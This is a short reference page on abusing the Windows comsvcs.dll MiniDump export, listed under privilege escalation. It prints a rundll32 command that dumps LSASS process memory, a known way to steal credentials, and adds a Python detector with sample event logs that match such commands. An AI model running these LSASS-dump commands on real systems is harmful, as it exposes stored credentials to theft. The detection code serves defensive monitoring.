~/Privilege Escalation/Windows/Binaries# cat Comsvcs.dll.md

COM+ Services

Paths:

c:\windows\system32\comsvcs.dll

Detection: use of the MiniDump export in this library

Dump

Calls the MiniDump exported function of comsvcs.dll, which in turn calls MiniDumpWriteDump.

rundll32 C:\windows\system32\comsvcs.dll MiniDump "[LSASS_PID] dump.bin full"
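
One way to detect the command line above in process-creation logs, as an added example that is not part of the original page. The event field names (`pid`, `image`, `cmd`), the sample records and the severity labels are constructed assumptions; the matcher also accepts the standard `dll,Export` rundll32 form.

```python
import re

# rundll32 + comsvcs.dll + the MiniDump export, in the form shown on this page.
# Case-insensitive; tolerates quotes, an optional directory prefix, and either
# a space or a comma between the library and the export name.
MINIDUMP_RE = re.compile(
    r'rundll32(?:\.exe)?"?\s+'
    r'"?(?:[^"\s,]*[\\/])?comsvcs(?:\.dll)?"?'
    r'[\s,]+MiniDump\b'
    r'(?:\s+"?(?P<pid>\d+)\s+(?P<out>[^\s"]+)\s+full"?)?',
    re.IGNORECASE,
)

# Constructed process-creation events (hypothetical field names and values).
SAMPLE_EVENTS = [
    {"pid": 624, "image": r"C:\Windows\System32\lsass.exe",
     "cmd": r"C:\Windows\system32\lsass.exe"},
    {"pid": 4100, "image": r"C:\Windows\System32\rundll32.exe",
     "cmd": r'rundll32 C:\windows\system32\comsvcs.dll MiniDump "624 dump.bin full"'},
    {"pid": 4200, "image": r"C:\Windows\System32\rundll32.exe",
     "cmd": r'"C:\Windows\System32\rundll32.exe" comsvcs.dll,MiniDump 5000 C:\Temp\x.dmp full'},
    {"pid": 4300, "image": r"C:\Windows\System32\rundll32.exe",
     "cmd": r"rundll32.exe shell32.dll,Control_RunDLL"},
    {"pid": 4400, "image": r"C:\Windows\System32\regsvr32.exe",
     "cmd": r"regsvr32 /s C:\windows\system32\comsvcs.dll"},
]

def find_minidump_calls(events):
    """Return one finding per event whose command line invokes comsvcs.dll MiniDump."""
    # Map each known PID to its image name so the dump target can be identified.
    images = {e["pid"]: e["image"].rsplit("\\", 1)[-1].lower() for e in events}
    findings = []
    for e in events:
        m = MINIDUMP_RE.search(e["cmd"])
        if not m:
            continue
        target = int(m["pid"]) if m["pid"] else None
        findings.append({
            "pid": e["pid"],
            "target_pid": target,
            "target_image": images.get(target),
            "dump_path": m["out"],
            # A dump of lsass.exe is the case this page describes.
            "severity": "high" if images.get(target) == "lsass.exe" else "medium",
        })
    return findings

if __name__ == "__main__":
    for finding in find_minidump_calls(SAMPLE_EVENTS):
        print(finding)
```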